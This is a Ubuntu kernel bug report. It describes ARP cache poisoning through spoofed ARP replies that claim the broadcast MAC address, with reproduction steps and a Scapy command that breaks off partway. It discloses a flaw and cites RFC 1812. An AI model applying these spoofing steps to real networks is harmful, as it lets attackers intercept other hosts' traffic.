arp cache updated by replies with broadcast address
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
linux (Ubuntu) |
Invalid
|
Medium
|
Unassigned |
Bug Description
Binary package hint: linux-image-generic
The Linux kernel is accepting ARP replies with entries that point to an broadcast Ethernet address, poisoning the arp cache.
The steps to reproduce this include sending an unsolicited arp reply to the given host where the hwsrc field is filled with ff:ff:ff:ff:ff:ff and the psrc field contains an IP address that already existed in the arp cache of the victim (lets say 192.168.0.1).
The consequence of this is that the kernel will update the arp cache with the entry like: 192.168.0.1 at FF:FF:FF:FF:FF:FF, and will send all packets directed to 192.168.0.1 to the broadcast destination. This will allow attackers to easy sniff all the traffic destined to the host 192.168.0.1, coming from the compromised machine.
Scapy can be used to create such packet with the command:pack = Ether(dst=
This must then be send, at regular intervals, with the command sendp(pack).
If this behavior is present at the linux-image-server server this might be a bigger problem. On server environments, where Linux maybe used as a router, this behavior goes against RFC 1812, that states:
"3.3.2 Address Resolution Protocol - ARP
(...)
A router MUST not believe any ARP reply that claims that the Link Layer address of another host or router is a broadcast or multicast address."
Testes performed on Kubuntu 7.10, command line only installation, kernel 2.6.22-14-generic.
Changed in linux-meta: | |
status: | New → Confirmed |
Changed in linux: | |
importance: | Undecided → Medium |
This bug report was marked as Confirmed a while ago but has not had any updated comments for quite some time. Please let us know if this issue remains in the current Ubuntu release, http:// www.ubuntu. com/getubuntu/ download . If the issue remains, click on the current status under the Status column and change the status back to "New". Thanks.
[This is an automated message. Apologies if it has reached you inappropriately; please just reply to this message indicating so.]